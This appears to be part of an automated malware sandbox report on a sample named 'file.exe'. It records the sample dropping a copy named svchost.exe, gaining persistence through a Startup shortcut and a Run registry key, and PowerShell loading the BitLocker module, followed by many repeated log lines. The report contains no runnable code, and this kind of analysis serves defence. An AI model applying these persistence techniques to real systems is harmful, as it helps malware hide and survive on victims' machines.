Source: svchost.exe.0.dr, qfyXcGSO3n7MPwJUdF1pWpSgkJoqnG02l2.cs	High entropy of concatenated method names: 'i7cyD0XTLEB0Eo6PcSMqpwbf4hMZg4sLYG', 'ygPwp9XZp1CNtXOvYnoSnk60K0pR4EzVwC', 'rDdzoPBPDGIhemY4IkLdEpjByHJCZf9ZZk', 'iayxv8iOD5PJUikNajoF8bAzd4OR0W1BOJ', '_5qRtMLOzp6vegzQlmGY0VvqtTEVxrzkOnV', 'sxvswXulgNMspyjbFclySjAL0qULrND153', 'ZkGh8jLFkXbpaAG3167hzW7mElum0Gzy4o', 'U0SMh7MOgaMA9emgAlTtfkDQ8K2p40TY3n', 'V9zlnJ7JAd6MhnJZXfbmyCeUH9Fp8zg3RZ', '_1kXGJPvV0iV4mL17w9kNyBIfBwGJWszAhI'

Persistence and Installation Behavior

Drops PE files with benign system names

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\svchost.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchost			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
